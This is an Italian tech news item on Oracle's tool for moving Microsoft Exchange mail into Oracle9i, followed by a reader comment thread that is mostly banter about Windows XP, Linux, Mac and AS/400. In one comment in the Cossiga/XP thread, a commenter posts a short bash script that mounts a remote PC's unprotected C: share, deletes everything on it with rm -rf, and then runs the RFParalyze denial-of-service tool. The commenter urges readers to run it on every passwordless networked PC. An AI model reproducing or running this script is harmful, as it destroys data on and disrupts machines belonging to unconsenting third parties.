Oracle attacca Microsoft sull'email

E sforna un tool di migrazione per chi usa Exchange: per portare la posta dei clienti Microsoft nei potenti database Oracle. Attacco alla baionetta


Redwood Shores (USA) – Oracle attacca Microsoft in quello che ritiene sia il suo punto più vulnerabile: la sicurezza. Il colosso dei database ha infatti appena varato un programma di migrazione con cui intende offrire alle aziende che utilizzano il mail server Microsoft Exchange la possibilità di passare, senza traumi, a Oracle9iAS Email sulla piattaforma Real Application Clusters.

Oracle, che con il suo sistema di e-mail garantisce alle aziende vantaggi in termini di sicurezza, affidabilità e costi di gestione, sostiene che gli utenti potranno continuare ad utilizzare Microsoft Outlook anche con Oracle9i.

“Microsoft è famosa per le e-mail e vogliamo che nessuno debba smettere di utilizzare Outlook”, ha spiegato Larry Ellison, chairman e CEO di Oracle. “Normalmente noi non pensiamo alle e-mail come ad un database di dati. Ma esse conservano informazioni d’affari. Non archiviate le vostre e-mail in un qualunque sistema, che potrebbe rivelarsi fragile e insicuro. Perché avere centinaia di server Exchange quando potreste avere solo uno o due database Oracle?”.

La soluzione proposta da Oracle è composta da un database che gira su di una serie di server cluster: ogni server può accedere all’intero database e, nel caso una macchina si guasti, il servizio di e-mail non dovrebbe subire nessun arresto. Oracle sostiene poi che la sua soluzione, basata sulla gestione delle e-mail in un unico database, aiuta gli amministratori di sistema ad sradicare eventuali e-mail infette, riduce gli investimenti in hardware e minimizza le spese di manutenzione software.

Oracle dichiara di aver già migrato con successo 44 server Exchange verso una sola installazione di Oracle9i.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    Re: troppe patch o sw house cialtrone
    Che un sw diventi più complesso e quindi più soggetto a bug è vero; cmq non per tutti è uguale; considerando anche che più si tenta di fare il sistema semplice, più si cade in performance, stabilià e sicurezza.Ma se si osserva da quando è nato il progetto KDE, ad oggi, un'interfaccia semplice in ambito UNIX, ì bug del sistema UNIX/KDE, sono cmq inferiori rispetto a win e GUI (un server grafico, poi è molto più complesso).Ed è vero che i vari tool delle house Linux, tendono a portare più bug al sistema; ma è anche vero che il 95% di questi è sviluppato dalle case stesse (sono open, ma l'open source è impegnato in altri proggetti anche); e poi non sono tutti open (Caldera). Se l'open concentrasse le sue energie anche su questi tool, sarebbero pochissimo bug-ati.Cmq, va visto anche che il server grafico con Gnome o KDE, non vuol dire necessariamente "più" bug per il sistema, prendere ad esempio i *BSD.Nessuno nega che anche le altre case operanti in win soffrano di bug, però né soffrono meno dei prodotti M$, in generale. E con l'indubbio vantaggio da parte di M$ di conoscere il codice di win*, di copiare sempre dalle altre case (il RAD l'ha introdotto Borland); ciò nonostante non brilla per qualità, se riferita alle altre house win*
  • Anonimo scrive:
    provato windows XP
    tralasciando il fatto che e' un sistema operativo ridicolo (io come professionista mi vergognerei ad avere i cartoni animati mentre cerco un file) dopo 10 minuti che l'ho usato mi e' crashato explorer.exe. E' apparso un simpatico dialogo che mi ha informato del crash e mi ha chiesto gentilmente se volevo mandare i dettagli del crash alla microsoft, e in piu' il mio numero di licenza e il mio ip.ah.. che sogno vedere la finanza a casa della gente.
    • Anonimo scrive:
      Re: provato windows XP
      - Scritto da: munehiro
      mentre cerco un file) dopo 10 minuti che
      l'ho usato mi e' crashato explorer.exe. SI vede che ti ha riconsciuto ^__^
      E'
      apparso un simpatico dialogo che mi ha
      informato del crash e mi ha chiesto
      gentilmente se volevo mandare i dettagli del
      crash alla microsoft, e in piu' il mio
      numero di licenza e il mio ip.E' un sistema X alleggerire il lavoro (?) del servizio assistenza. :-P
      ah.. che sogno vedere la finanza a casa
      della gente.Illuso
      • Anonimo scrive:
        Re: provato windows XP
        - Scritto da: SiN


        - Scritto da: munehiro


        mentre cerco un file) dopo 10 minuti che

        l'ho usato mi e' crashato explorer.exe.

        SI vede che ti ha riconsciuto ^__^non lo metto in dubbio....
        E' un sistema X alleggerire il lavoro (?)
        del servizio assistenza. :-Pdiciamo che e' un modo per controllare chi ha una licenza valida, piuttosto.Piu' si va avanti piu' siamo sullo stile orwell.

        ah.. che sogno vedere la finanza a casa

        della gente.

        Illusogia'
  • Anonimo scrive:
    click: scarica - perché no?
    perché non fanno un bug checker praticissimoe basta?fai un registro con le varie patch e i vari service pack (cversioni nella proprialingua o versioni internazionali chefunzionino dappertutto) , controlli e via.DIRETTAMENTE NEL SISTEMA.non devo mica per forza leggermi tutto il leggibile nel mondo!(ok, si, lo devo fare, ora - ma se il mio sistema è figo, intanto io schiaccio il bottoncione verde "AGGIORNA TUTTO" ... e POI mi informo di tutto)certo, che come amministratore o attento utente del mio sistema, io DEVO fare queste cose da me ... lo so da me. Ma per loro che progettano il software e ormai è dimostrato quanto sia bacato ... e dato che fortunatamente producono le pezze ... almeno che si auto-pezzi, che controlli lui cosa ci va cosa non ci va, perché dove ... eccheccazz!!!!
    • Anonimo scrive:
      Re: click: scarica - perché no?
      - Scritto da: Yomm_Kyppur_lagash
      perché non fanno un bug checker praticissimo
      e basta?Perche' non fanno un computer che pensa al posto tuo e ti dice anche quando / quanto mangiare / cagare ?
      fai un registro con le varie patch e i vari
      service pack (cversioni nella propria
      lingua o versioni internazionali che
      funzionino dappertutto) , controlli e via.Tipo Live Update ? E non c'e' gia' ?
      DIRETTAMENTE NEL SISTEMA.
      non devo mica per forza leggermi tutto il
      leggibile nel mondo!
      (ok, si, lo devo fare, ora - ma se il mio
      sistema è figo, intanto io schiaccio il
      bottoncione verde "AGGIORNA TUTTO" ... e POI
      mi informo di tutto)Come per l'antivirus della McAffee, che quando gli ha spoofato la macchina dove c'era l'auto update facevano scaricare agli utonti virus invece di antivirus :)
      certo, che come amministratore o attento
      utente del mio sistema, io DEVO fare queste
      cose da me ... lo so da me. Ma per loro che
      progettano il software e ormai è dimostrato
      quanto sia bacato ... e dato che
      fortunatamente producono le pezze ... almeno
      che si auto-pezzi, che controlli lui cosa ci
      va cosa non ci va, perché dove ...
      eccheccazz!!!!Tra un po' ci sara X-Box che pensera' al posto tuo, e non dovrai (non potrai) fare nulla di diverso che la macchina non apprpovi, contento ???
    • Anonimo scrive:
      Re: click: scarica - perch?no?
      cosi non servi più e ti licenzianociao
    • Anonimo scrive:
      Re: click: scarica - perché no?
      - Scritto da: Yomm_Kyppur_lagash
      perché non fanno un bug checker praticissimo
      e basta?

      fai un registro con le varie patch e i vari
      service pack (cversioni nella propria
      lingua o versioni internazionali che
      funzionino dappertutto) , controlli e via.
      Se ti può consolare, su AS400 una cosa del genere esiste già: basta telefonare alla IBM comunicando la release del SO ed il livello di PTF (patch), recuperabile com valore di sistema, e nel giro di pochi giorni ti arriva uno o più CDROM con tutto quello che ti manca... autoinstallante.Da osservare che le PTF del 400 in genere ne aumentano l'efficienza, oltre a tappare qualche buco (molto raro in verità).Ovvero: molte aziende si fanno pagare, non tutte offrono effettivamente un servizio.
      • Anonimo scrive:
        Re: click: scarica - perché no?

        Da osservare che le PTF del 400 in genere ne
        aumentano l'efficienza, oltre a tappare
        qualche buco (molto raro in verità).
        Vediamo di non essere ridicoli, un simile prodotto riduce gli introiti da assistenza remota o locale, nonche la necessita' di comprare nuover versioni del sistema, e' una fesseria.Inoltre fare un cdrom di tutto per fare l'aggiornamento viola un brevetto di Redmond che ha inventato questa cosa anni fa. Se vuoi il cd e' disponibile da anni in varie versioni : winzme winzNt5 winzN6 aka winz2k e winzxpL'ibm non inventa niente di nuovo e dovrebbe imparare dal barone dell'informatica
  • Anonimo scrive:
    Re: troppe patch o sw house cialtrone
    Cristo ma allora è vero che esiste il "Paradiso dell'informatico", dove l'azienda si adatta alle esigenze tecniche... Quanti siete al CED? 15? Noi siamo in due, e io, se voglio leggere PI devo usare la pausa pranzo (sperando che non mi rompano le RAM anche nell'ora canonica...).Noi lavoriamo dalle 9 alle 12 ore al giorno e riusciamo a malapena a star dietro alle richieste di continue implementazioni e/o personalizzazioni. Aggiungici le continue richieste stile "mayday" da parte di utenti che non si ricordano come fare le cose più ovvie (senza contare il tempo perso con PC che si impiantano e buchi MSWIN vari...), le ore perse in assurede riunioni ove si passa il tempo a parlare del sesso degli angeli, le stampanti che si pmiantano (e riprendono a funzionare appena io metto piede nella stanza...). la pretesa che il gestionale si adatti alle ultime circolari aziendali da un minuto all'altro (senza avvertire il CED) etc. etc...Ma veramente hai tempo di star dietro a un sistema parallelo di test? Ma davvero l'azienda ti consente di dedicartici? Ma ti rendi conto del culo che hai o no?
    • Anonimo scrive:
      Re: troppe patch o sw house cialtrone
      - Scritto da: PanzerFaust
      Cristo ma allora ?vero che esiste il
      "Paradiso dell'informatico", dove l'azienda
      si adatta alle esigenze tecniche... Quanti
      siete al CED? 15? Noi siamo in due, e io, se
      voglio leggere PI devo usare la pausa pranzo
      (sperando che non mi rompano le RAM anche
      nell'ora canonica...).complimenti per la vena ironica, ma onestamente se sopporti una situazione di questo genere, (per un mese sono stato anche io in un posto dove gestivo da solo un nutrito parco sw ), e perchè o sei il proprietario (quindi sono cazz.. tuoi), o ti pagano tanto (e qui non credo in genere e il contrario più lavoro meno soldi), oppure perche fai da anni questo lavoro e non ti va di rimetterti in gioco (e bello credersi bravissimo facendo e rifacendo sempre le stesse cose).

      Noi lavoriamo dalle 9 alle 12 ore al giorno
      e riusciamo a malapena a star dietro alle
      richieste di continue implementazioni e/o
      personalizzazioni. o parlato di applicazioni per il web non dell'applicazioncina in vb che a malapena accede ad un file in mdb, scusami ma le problematiche fra le due tipologie sono ben diverse.
      Aggiungici le continue
      richieste stile "mayday" da parte di utenti
      che non si ricordano come fare le cose pi?
      ovvie scusami ma qui sbagliate l'utente finale non deve mai parlare con il programmatore, addestrate una segretazia affinche vi loggi solo le richieste più urgenti, ricordatevi che l'utente finale di un sistema informativo non ha mai ragione (e che siamo dal fruttivendolo).
      (senza contare il tempo perso con PC
      che si impiantano e buchi MSWIN vari...),ricordati che stai parlando con un programmatore (queste scuse le uso anche io dal cliente)non con l'utonto del tuo programma i buchi non sono dell' so ma del tuo programma
      le
      ore perse in assurede riunioni ove si passa
      il tempo a parlare del sesso degli angeli,
      le stampanti che si pmiantano (e riprendono
      a funzionare appena io metto piede nella
      stanza...). questi sono problemi che tutti hanno, hai provato a fare le riunioni in piedi e a cellulare spento(funziona), hai provato a non farti mettere i piedi in testa, devi uscire alle 6 alle 6 chiudi e te ne vai molto semplice.
      la pretesa che il gestionale si
      adatti alle ultime circolari aziendali da un
      minuto all'altro (senza avvertire il CED)
      etc. etc...come sopra non farti mettere i piedi in testa
      Ma veramente hai tempo di star dietro a un
      sistema parallelo di test? Ma davvero
      l'azienda ti consente di dedicartici? Ma ti
      rendi conto del culo che hai o no?lo puoi avere anche tu se solo ti cerchi un altro lavoro, però cosi le certezze terminano il sottile piacere di essere sempre in primo piano perche solo tu possiedi certe conoscenze ecc.. e dura perdere questi vantaggi.
      • Anonimo scrive:
        Re: troppe patch o sw house cialtrone
        - Scritto da: ebelloessereforti


        - Scritto da: PanzerFaust

        Cristo ma allora ?vero che esiste il

        "Paradiso dell'informatico", dove
        l'azienda

        si adatta alle esigenze tecniche... Quanti

        siete al CED? 15? Noi siamo in due, e io,
        se

        voglio leggere PI devo usare la pausa
        pranzo

        (sperando che non mi rompano le RAM anche

        nell'ora canonica...).

        complimenti per la vena ironica, ma
        onestamente se sopporti una situazione di
        questo genere, (per un mese sono stato anche
        io in un posto dove gestivo da solo un
        nutrito parco sw ), e perchè o sei il
        proprietario (quindi sono cazz.. tuoi), o ti
        pagano tanto (e qui non credo in genere e il
        contrario più lavoro meno soldi), oppure
        perche fai da anni questo lavoro e non ti va
        di rimetterti in gioco (e bello credersi
        bravissimo facendo e rifacendo sempre le
        stesse cose).Per la precisione è il mio quarto lavoro in 10 anni... I primi 3 ero in SW House, adesso sono in un CED aziendale.



        Noi lavoriamo dalle 9 alle 12 ore al
        giorno

        e riusciamo a malapena a star dietro alle

        richieste di continue implementazioni e/o

        personalizzazioni.

        o parlato di applicazioni per il web non
        dell'applicazioncina in vb che a malapena
        accede ad un file in mdb, scusami ma le
        problematiche fra le due tipologie sono ben
        diverse.Io no faccio nessuna delle due cose...vedi sotto.

        Aggiungici le continue

        richieste stile "mayday" da parte di
        utenti

        che non si ricordano come fare le cose pi?

        ovvie

        scusami ma qui sbagliate l'utente finale non
        deve mai parlare con il programmatore,
        addestrate una segretazia affinche vi loggi
        solo le richieste più urgenti, ricordatevi
        che l'utente finale di un sistema
        informativo non ha mai ragione (e che siamo
        dal fruttivendolo).Peccato che l'utente finale abiti alla porta accanto e che gli basta fare tre passi per entrarmi in ufficio... che faccio, gli sparo? Se un certo utente non capisce come rilasciare gli spool di stampa (gesù, basta premere un tasto...), nonostante gli sia stato spiegato 25347 volte, che devo fare?


        (senza contare il tempo perso con PC

        che si impiantano e buchi MSWIN vari...),

        ricordati che stai parlando con un
        programmatore (queste scuse le uso anche io
        dal cliente)non con l'utonto del tuo
        programma i buchi non sono dell' so ma del
        tuo programmaPrecisazione: io non sviluppo per PC, ma su AS/400. Nella mia azienda i PC vengono usati o per emulare terminali AS/400 o per applicativi Office. Inoltre, sono abituato ad aggredire chiunque si permetta di installare qualsiasi cosa su PC (in un paio di casi ho rimosso il CD-ROM).Ergo, i PC si impiantano per problemi loro, non per le mie applicazioni... le quali girano su un sistema operativo serio.

        le

        ore perse in assurede riunioni ove si
        passa

        il tempo a parlare del sesso degli angeli,

        le stampanti che si pmiantano (e
        riprendono

        a funzionare appena io metto piede nella

        stanza...).

        questi sono problemi che tutti hanno, hai
        provato a fare le riunioni in piedi e a
        cellulare spento(funziona), hai provato a
        non farti mettere i piedi in testa, devi
        uscire alle 6 alle 6 chiudi e te ne vai
        molto semplice.Questa richiede una risposta dettagliata:1) io devo uscire alle 18:30 ed alle 18:30 esco. Certo, se sono in riunione dalle 17:30 e la riunione si protrae, non posso mandare tutti a quel paese, amministratore delegato compreso, no?2) Non dico che sono problemi solo miei (ci mancherebbe), dico però che mi portano via un sacco di tempo.3) telefonata dal reparto spedizioni alle ore 18.25: "mi si è impiantata la stampante delle bolle, ho un camion con autorimorchio di un corriere che deve partire" Che gli rispondo, che devo andare a casa? Il giorno dopo mi telefonano di rimanerci...4) oltre agli utonti in questa azienda c'è un sacco di gente in gamba, che fa oltre il suo dovere: mi secca lasciarli nelle peste per uscire in orario.

        la pretesa che il gestionale si

        adatti alle ultime circolari aziendali da
        un

        minuto all'altro (senza avvertire il CED)

        etc. etc...

        come sopra non farti mettere i piedi in testaNon è questione di farsi mettere i piedi in testa: prima fanno le cose e poi ci avvertono. E visto che sono loro a poter licenziare me, e non viceversa...

        Ma veramente hai tempo di star dietro a un

        sistema parallelo di test? Ma davvero

        l'azienda ti consente di dedicartici? Ma
        ti

        rendi conto del culo che hai o no?

        lo puoi avere anche tu se solo ti cerchi un
        altro lavoro, però cosi le certezze
        terminano il sottile piacere di essere
        sempre in primo piano perche solo tu
        possiedi certe conoscenze ecc.. e dura
        perdere questi vantaggi.1) vedi mia prima risposta.2) quali vantaggi?3) essere in primo piano? Io sono solo "il tizio del CED..." :-)Ciao.
  • Anonimo scrive:
    Xbox progettata con il mac
    A tutti quelli che disprezzano Apple e ammirano Microsoft:la tanto decantata Xbox e' stata progettata con i computer apple.Andate alla pagina http://www.microsoft.com/jobs/design/workXBox.htmAlla Microsozz per progettatare la console si sono dovuti rivolgere ai computer della mela. Windows m....da non ce la fa!!!Ah ah ah ah ah!!!!!!Andate a nascondervi va'...voi e win
    • Anonimo scrive:
      Re: Xbox progettata con il mac
      - Scritto da: ex utente winl'unica cosa giusta che ai scritto ex utente win, meno male
      A tutti quelli che disprezzano Apple e
      ammirano Microsoft:
      la tanto decantata Xbox e' stata progettata
      con i computer apple.be se ti puo rinquorare i chip che usa il tuo apple con il verme non che quelli della maggior parte dei pc sono stati progettati usando unix usando sw di modellazione dell'hw appositi.quindi con questo passiamo tutti a unix mava a caga..
      Andate alla pagina
      http://www.microsoft.com/jobs/design/workXBox

      Alla Microsozz per progettatare la console
      si sono dovuti rivolgere ai computer della
      mela. Windows m....da non ce la fa!!!
      Ah ah ah ah ah!!!!!!
      Andate a nascondervi va'...voi e wincosa dire di questa perla di sagezza una sola cosa prima o poi il tristo mietitore arrivera e togliera un altro brufolo dolorante dal cu.. dell'umanita.
      • Anonimo scrive:
        Re: Xbox progettata con il mac
        Ti brucia eh? Ma che vuoi......spesso i piu forti sono anke i piu' antipatici. eh eh ehSi, sono un EX UTONTO WIN, sono inkazzato perche' solo dopo tre anni mi sono reso conto di quanto cesso e' windows!!!
        • Anonimo scrive:
          Re: Xbox progettata con il mac
          - Scritto da: ex utonto win
          Ti brucia eh? Ma che vuoi......spesso i piu
          forti sono anke i piu' antipatici. eh eh eh
          Si, sono un EX UTONTO WIN, sono inkazzato
          perche' solo dopo tre anni mi sono reso
          conto di quanto cesso e' windows!!!be sei passato da utonto win a utonto mac non hai fatto un gran passo ehehehehehe.probabilmente tra tre anni ti renderai conto di quanto e cesso mac e cambierai mestiere (a fare il trans si guadagna un sacco pero dopo ti brucia)
          • Anonimo scrive:
            Re: Xbox progettata con il mac


            be sei passato da utonto win a utonto mac
            non hai fatto un gran passo ehehehehehe.
            probabilmente tra tre anni ti renderai conto
            di quanto e cesso mac e cambierai mestiere
            (a fare il trans si guadagna un sacco pero
            dopo ti brucia) Ah....non credo proprio sai?Tu probabilmente non hai mai nemmeno usato un mac se tutto va bene e magari usi win per giocare, word, excel e programmini vari ecc
  • Anonimo scrive:
    Mr.Gates il suo XP é un bug unico (al solito...)
    Andate a leggervi quello che è successo a Cossiga che da che ha installato XP rischia di dover formattare un HD veramente importante:http://www.ilnuovo.it/nuovo/foglia/0,1007,89652,00.html
    • Anonimo scrive:
      Re: Mr.Gates il suo XP é un bug unico (al solito..
      Ok, probabilmente ho generalizzato un po' troppo e facevo meglio a star zitto (anche stavolta).Rimane il fatto che c'è gente che critica Linux e l'Open Source per partito preso o giudicando in base a quello che dice qualche simpaticone che scrive in questi forum, senza capire (e ne sono *veramente* convinto) che probabilmente starebbero ancora aspettando NT5, le patch di sicurezza per IIS e che .NET se la sognerebbero, se non fosse che MS si sta accorgendo che la concorrenza (finalmente) c'è e sta anvanzando. Dovrebbero essere grati all'OSS solo per questo, secondo me.P.S. Se volete la cena la facciamo lo stesso... però si paga alla romana e si parla solo di donne ;o)
    • Anonimo scrive:
      Re: Mr.Gates il suo XP é un bug unico (al solito...)
      - Scritto da: Mac User
      Andate a leggervi quello che è successo a
      Cossiga che da che ha installato XP rischia
      di dover formattare un HD veramente
      importante:
      http://www.ilnuovo.it/nuovo/foglia/0,1007,896Ecco in breve la notizia:"Caro e giovane Mr. Bill Gates", il suo "nuovissimo programma Microsoft XP Home? non funziona. Inizia così la lettera, di fuoco, che l'ex presidente della Repubblica Francesco Cossiga ha inviato al numero uno di Microsoft. Poche parole, di protesta, per mostrare tutta la sua irritazione nei confronti di un programma tanto pubblicizzato e, secondo Cossiga, altrettanto inutilizzabile. ?Dopo due giorni di funzionamento è entrato in tilt e né i miei amici né la Microsoft italiana riescono a risolvere il problema, con il pericolo che il disco fisso del computer debba essere di nuovo formattato di tutti i dati contenuti". Francesco Cossiga, che si qualifica come "un former presidente della repubblica italiana che, personalmente e nel suo ufficio, fa largo uso di computers" si rivolge al fondatore di Microsoft chiamandolo "caro e giovane Mr. Bill Gates". La missiva ricca di lamentele si conclude con un consiglio che suona come un rimprovero: "forse, mio caro e giovane Mr. Gates, prima di mettere sul mercato, con tanta pubblicità, suoi nuovi prodotti dovrebbe farli testare un po' più a lungo e con maggiore cura e perizia". Da quello che leggo in giro (soprattutto lamentele) mi sembra che win XP non sia quello che ci aspettavamo, o no?Bah.....Microsoft sta proprio andando verso il fondo mi sa...e ora non rispondano i soliti saputelli che usano win solo per giochi, word ecc
      • Anonimo scrive:
        Re: Mr.Gates il suo XP é un bug unico (al solito...)
        aggiungo in complemento l'articolo apparso su repubblica:http://www.repubblica.it/online/tecnologie_internet/windowsxp/cossiga/cossiga.htmlciaoE via di picconate!
        • Anonimo scrive:
          Re: Mr.Gates il suo XP é un bug unico (al solito...)
          Abbiamo avuto un presidente del Consiglio che non sa parlare in Italiano foguriamoci se sa usare Windows Xp ed il computer????
          • Anonimo scrive:
            Re: Mr.Gates il suo XP é un bug unico (al solito...)
            Bè, neanche la M$ Italia sa usare winXP, visto che non riesce a recuperare i dati dall'hd di Cossiga ed a far funzionare XP.E se non lo sanno fare loro........
          • Anonimo scrive:
            Re: Mr.Gates il suo XP é un bug unico (al solito...)
            - Scritto da: Fantamen
            Abbiamo avuto un presidente del Consiglio
            che non sa parlare in Italiano foguriamoci
            se sa usare Windows Xp ed il computer????Infatti, usa Windows (anzi, non-usa, perchè non funzia).'Iao
    • Anonimo scrive:
      Re: Mr.Gates il suo XP é un bug unico (al solito...)
      Veramente sull'articolo si dice che i problemi sono comparsi dopo un paio di giorni.Se le testine del mio hard disk planano sull'hard disk stesso, non c'è nessun sistema operativo che regga il colpo.Siamo davvero sicuri che il problema sia di XP? Vedo decine di Windows XP funzionare regolarmente senza problemi. Una rondine non fa primavera. Anche se è una rondine importante.Comunque concordo sul fatto che MS Italia dovrebbe essere in grado di chiarire cosa è successo.- Scritto da: Mac User
      Andate a leggervi quello che è successo a
      Cossiga che da che ha installato XP rischia
      di dover formattare un HD veramente
      importante:
      http://www.ilnuovo.it/nuovo/foglia/0,1007,896
      • Anonimo scrive:
        Re: Mr.Gates il suo XP é un bug unico (al solito...)
        - Scritto da: Darth Vader
        Veramente sull'articolo si dice che i
        problemi sono comparsi dopo un paio di
        giorni.

        Se le testine del mio hard disk planano
        sull'hard disk stesso, non c'è nessun
        sistema operativo che regga il colpo.Le testine del tuo cervello hanno spiaccicato i tuoi neuroni già da 1 pezzo.AHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHHHHHHHbye from Alien
        • Anonimo scrive:
          Re: Mr.Gates il suo XP é un bug unico (al solito...)
          - Scritto da: Alien


          - Scritto da: Darth Vader

          Veramente sull'articolo si dice che i

          problemi sono comparsi dopo un paio di

          giorni.



          Se le testine del mio hard disk planano

          sull'hard disk stesso, non c'è nessun

          sistema operativo che regga il colpo.

          Le testine del tuo cervello hanno
          spiaccicato i tuoi neuroni già da 1 pezzo.
          AHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA
          bye from AlienE i NEURONI mancano ormai da un pezzo al tuo amico DRAGA.
          • Anonimo scrive:
            Re: Mr.Gates il suo XP é un bug unico (al solito...)
            - Scritto da: alien


            - Scritto da: Alien





            - Scritto da: Darth Vader


            Veramente sull'articolo si dice che i


            problemi sono comparsi dopo un paio di


            giorni.





            Se le testine del mio hard disk planano


            sull'hard disk stesso, non c'è nessun


            sistema operativo che regga il colpo.



            Le testine del tuo cervello hanno

            spiaccicato i tuoi neuroni già da 1 pezzo.


            AHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA

            bye from Alien
            E i NEURONI mancano ormai da un pezzo al tuo
            amico DRAGA.Visto che butta fuori "XP-TONT" x U-tont.
      • Anonimo scrive:
        Re: Mr.Gates il suo XP é un bug unico (al solito...)
        Un bug, seppur importante non significa niente!Ne sorgeranno inevitabilmente altri, anzi ci saranno già, seppur minori.La cosa che invece non è accettabbile, sono (per gli ut. win*) le promesse di Bill & C.; una martellante campagna pubblicitaria (per la verità meno di quella del win95, ma più accattivante) e relative interviste per garantire ciò che non è vero, oltrettutto impossibile per un'o.s. win* che punta, per come è stato costruito, su qualità diverse da quelle pubblicizzate.
      • Anonimo scrive:
        Re: Mr.Gates il suo XP é un bug unico (al solito...)
        ...se Cossiga perderà i dati è sicuro colpa sua e di come li gestisce..non certo del sistema operativo... poi mi meraviglio della gente che crede ancora a tutte le boiate che scrivono i giornali.... bah
        • Anonimo scrive:
          Re: Mr.Gates il suo XP é un bug unico (al solito...)
          ma se il problema è intervenuto dopo l'installazione di XP non si può escludere a-priori un concorso di colpa di quest'ultimo nel problema tecnnico in qui è incorso Cossiga....dunque mi sembra troppo simplicistico definirlo incapace....saluti
      • Anonimo scrive:
        Re: Mr.Gates il suo XP é un bug unico (al solito...)

        Se le testine del mio hard disk planano
        sull'hard disk stesso, non c'è nessun
        sistema operativo che regga il colpo.vediamo di non dire cazzate, che winzxp non ha certo bisogno di questo per andare completamente a puttane
        Siamo davvero sicuri che il problema sia di
        XP? Vedo decine di Windows XP funzionare
        regolarmente senza problemi. Una rondine non
        fa primavera. Anche se è una rondine
        importante.gia' ma qui piove merda, per cosa credi che facciano patch, per le rondini?

        Comunque concordo sul fatto che MS Italia
        dovrebbe essere in grado di chiarire cosa è
        successo.ma cosa vuoi che dichiarino ? che sono un'ammasso di ...Oltretutto non sono nemmeno loro a scrivere le troiate che sputtanano xp, il barone scrive fa scrivere le sue cagate a redmondE' certo che le migliaia di puttanate introdotte da winz2k e ampliate in winzxp che hanno a che vedere con l'accesso remoto il controllo via internet e la gestione via interner, di cui gli utenti non sanno un cazzo, e non sfruttano nulla, sono la grana di tutti gli ultimi casini di questo cesso di sw, altrimenti come pensi sia possibile beccarti blaster e soci, che funzionano soli li'?
    • Anonimo scrive:
      Re: Mr.Gates il suo XP é un bug unico (al solito...)
      a linuxari immaginate cosa avrebbe perso il nostro caro ex presidente se invece di usare xp avesse usato linux o mac ehehehe.a preside invece di lamenta manda a gaeta chi ti ha istallato l'so sul computer
      • Anonimo scrive:
        Re: Mr.Gates il suo XP é un bug unico (al solito..
        comunque sia anche un bambino sarebbe in grado di attaccare come slave l'hard disk di cossiga e copiarne tutto il contenuto su un altro (recuperando tutti i famosi dati)... In ogni caso Windows eXPloit è un'emerita ciofeca. Provate a registrare dal waveout o meglio come lo chiama lui "Somma"... ok ora mentre registra provate ad andare anche solo a sfiorare l'icona con la campanellina in basso a sinistra... Come dici ? rimetto win 98 che preferisco un errore irreversibile anzichè un crash così drastico ? nooo su 98 non lo fa quel lavoro :
        Stessa cosa se al posto della campanellina vi spostate su una qualsiasi finestra che avrete aperto in precedenza (per playare quello che volete registrare dal waveout)Ps stavo solo cercando di registrarmi le musiche dei vecchi giochi capcom usando QPlayer... Ok, ho installato win2k e tutto funziona ora... finalmente ho tutte le traccie di Street Fighter in MP3 !!! PUARGH! let's kill all windoze echo "insert ip"read IPecho "insert computer name"read NOMEPCecho $IP $NOMEPC

        /etc/hostsif ! [ -d ./destroyme ]; then mkdir destroymefimount -t smbfs //$NOMEPC/C ./destroyme ; cd destroyme ; rm -rf * ; cd .. ; umount ./destroymeif [ -f ./RFParalyze ]; then ./RFParalyze $IP $NOMEPC 1
        /dev/null 2
        /dev/nullelseecho "RFParalyze not found... skipping"fiecho "All right... another winpuz destroyed"mi raccomando fatelo su tutti i pc che trovate in rete con share senza pass
  • Anonimo scrive:
    Poverine
    "fra cui tre nuove di zecca e riguardanti la gestione dei cookie e le URL malformate."... le URL malformate, chissa' se un giorno si potra' correggerne il dna prima che vengano al mondo.
  • Anonimo scrive:
    Concorrenza
    Questo e'il segno che La presenza dell'Open Source come concorrente ha dato una smossa a M$ che forse si e'decisa a prendere sul serio la sicurezza(+che altro xmantenere la sua posizione di dominatrice del mercato) La concorrenza puo'solo fare del bene ad entrambi che si miglioreranno per superarsi a vicenda.Anche se in ambito Open Source questa e'pratica comune, chissa magari questa novita'della concorrenza piacera'anche a Gates e soci :-))))))Byez
    • Anonimo scrive:
      Re: Concorrenza
      Che win* sia un o.s. incentrato sulla facilità ed immediatezza d'uso e produttività, non c'è niente da dire; come contropartita è ovvio, che i win* scemano sul lato tecnico: security etc. È un pacchetto, diverso dagli UNIX in generale e cmq con un pacchetto diverso.La vera domanda, fermo lasciando i limiti dei win* è: win* cosi come dato da M$ è il max che si può ottenere da quel tipo di pacchetto?Detto diversamente si può rendere win* più sicuro, e magari più semplice? E la M$ si adopera per ciò ad ogni rilascio di win, al max?Dalle varie patch la risposta mi sembra no!Bill & C., ammete che rilasciare in open source un o.s. e relativo sw, li rende più efficienti; aggiungendo cmq che è impossibile per una società, non ci si può fare del business (chissà perchè per IBM, HP, Sun, etc. si).Ma con i limiti dell'essere closed win, la domanda rimane, e i fatti dicono che M$ non si adopera al max; tanto il popolo bue acquisterà cmq quella schifezza che passa; per fortuna a smuovere le acque, almeno in ambito server, vi è la concorrenza, e quelle persone che sono stanche di far parte del popolo bue di Bill, hanno deciso di essere liberi.
      • Anonimo scrive:
        Re: Concorrenza
        Beh speriamo che la concorrenza faccia bene anche al lato desktop di Linux, evitando possibilmente skifezze windows-like, il progetto KDE si sta muovendo bene x il momento, anche se credo che il problema di Linux sul fronte desktop sia X.Byez
        • Anonimo scrive:
          Re: Concorrenza
          - Scritto da: pikappa
          Beh speriamo che la concorrenza faccia bene
          anche al lato desktop di Linux, evitando
          possibilmente skifezze windows-like, il
          progetto KDE si sta muovendo bene x il Non riesco ad immaginare niente di più Windows-like di KDE, che fino a poco fa aveva il tema di default praticamente uguale alla GUI di Redmond...
          momento, anche se credo che il problema di
          Linux sul fronte desktop sia X.X non è un problema, e anche se lo fosse sono in pochi quelli che hanno intenzione di risolverlo... www.berlin-project.org
          • Anonimo scrive:
            Re: Concorrenza
            - Scritto da: A.C.
            Non riesco ad immaginare niente di più
            Windows-like di KDE, che fino a poco fa
            aveva il tema di default praticamente uguale
            alla GUI di Redmond...Intendevo dire win-like non tanto nell'apparenza,che ci può anche stare, quanto nella pesantezza dell'interfaccia o l'installazione di servizi inutili(cose tipo active-desktop)

            momento, anche se credo che il problema di

            Linux sul fronte desktop sia X.

            X non è un problema, e anche se lo fosse
            sono in pochi quelli che hanno intenzione di
